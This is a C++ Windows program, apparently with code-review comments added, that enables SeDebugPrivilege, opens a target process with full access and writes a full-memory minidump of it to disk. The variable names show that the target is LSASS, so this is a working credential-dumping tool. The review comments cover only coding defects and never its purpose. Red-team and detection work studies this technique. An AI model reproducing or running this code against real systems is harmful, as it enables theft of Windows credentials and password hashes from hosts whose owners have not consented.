#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <TlHelp32.h>
using namespace std;
// Change the current process's privileges (enable or disable one named privilege)
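// Enable (bEnable != FALSE) or disable (bEnable == FALSE) the named privilege
// on the current process's access token.
//
// Returns TRUE only when the privilege was actually adjusted. The original
// returned AdjustTokenPrivileges' result directly, but that call returns TRUE
// even when the token does not hold the privilege at all and reports that
// case only through GetLastError() == ERROR_NOT_ALL_ASSIGNED. On failure the
// last-error value describing the cause is left in place for the caller.
BOOL EnablePrivilege(LPCTSTR lpPrivilegeName, BOOL bEnable)
{
    TOKEN_PRIVILEGES tp = {};
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;

    // Resolve the privilege name to its LUID on the local system (nullptr system name).
    if (!LookupPrivilegeValue(nullptr, lpPrivilegeName, &tp.Privileges[0].Luid))
    {
        return FALSE;
    }

    HANDLE hToken = nullptr;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        return FALSE;
    }

    const BOOL bAdjusted = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), nullptr, nullptr);
    // Capture the error before CloseHandle, which may overwrite the thread's last error.
    const DWORD dwAdjustError = GetLastError();
    CloseHandle(hToken);

    // A TRUE return with ERROR_NOT_ALL_ASSIGNED means the token lacks the
    // privilege, so nothing was enabled; treat that as failure.
    if (!bAdjusted || dwAdjustError == ERROR_NOT_ALL_ASSIGNED)
    {
        SetLastError(dwAdjustError);
        return FALSE;
    }
    return TRUE;
}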
#pragma comment(lib, "Dbghelp.lib")
// Entry point: writes a minidump of the process whose PID is given in argv[1]
// to a file named "<argv[1]>.dmp" (relative path, so presumably the current
// working directory), using MiniDumpWriteDump from DbgHelp.
//
// NOTE(review): argv is wchar_t*, yet the code uses TCHAR, _ttoi and the
// generic CreateFile macro; this only compiles as written when UNICODE/_UNICODE
// are defined — confirm the build settings.
int wmain(int argc, wchar_t* argv[]) {
// NOTE(review): this rejects every argc other than 2, so the "3 == argc" branch
// below can never run; the "2 arg" message also counts the program name.
if(2 != argc){
printf("Please input 2 arg");
return 0;
}
// Default dump type; a numeric override from argv[2] was evidently intended
// but is unreachable because of the check above.
DWORD dwFlags = MiniDumpWithFullMemory;
if(3 == argc){
dwFlags = _ttoi(argv[2]);
}
// PID is parsed verbatim from argv[1]; _ttoi yields 0 on non-numeric input,
// which is not rejected here (OpenProcess would then fail below).
DWORD lsassPID = _ttoi(argv[1]);
// NOTE(review): lsassPID is a DWORD (unsigned long); "%d" is a format mismatch,
// "%lu" would be the matching specifier. Same on the two GetLastError() prints.
printf("OpenProcess %d\n", lsassPID);
HANDLE lsassHandle = NULL;
// NOTE(review): swprintf here is the unbounded form; an argv[1] longer than
// MAX_PATH - 5 characters would overflow szName. A length-checked formatter
// (e.g. swprintf_s / _snwprintf_s) would bound the write.
TCHAR szName[MAX_PATH] = {0};
swprintf(szName, L"%s.dmp", argv[1]);
// Output file: GENERIC_ALL, no sharing, CREATE_ALWAYS (silently overwrites an
// existing "<PID>.dmp"). NOTE(review): the result is never compared against
// INVALID_HANDLE_VALUE, so a failed create is only noticed when
// MiniDumpWriteDump fails later with a less specific error.
HANDLE outFile = CreateFile(szName, GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
// NOTE(review): the return value is ignored; if SeDebugPrivilege cannot be
// enabled the failure only surfaces as an OpenProcess error below.
EnablePrivilege(SE_DEBUG_NAME, TRUE);
// Non-inheritable handle (bInheritHandle = 0) with full access rights.
lsassHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, lsassPID);
if(!lsassHandle){
printf("OpenProcess%d\n", GetLastError());
return 0;
}
// dwFlags is cast straight to MINIDUMP_TYPE; no exception, user-stream or
// callback parameters are supplied (the three trailing NULLs).
if(MiniDumpWriteDump(lsassHandle, lsassPID, outFile, (MINIDUMP_TYPE)dwFlags, NULL, NULL, NULL)){
// NOTE(review): the purpose of this 5 s pause is not evident from the code —
// MiniDumpWriteDump is synchronous, so the file is complete when it returns.
Sleep(5000);
printf("Success\r\n");
}else{
printf("Error, %d\r\n", GetLastError());
}
// NOTE(review): outFile and lsassHandle are never closed; they are only
// released by process exit.
return 0;
}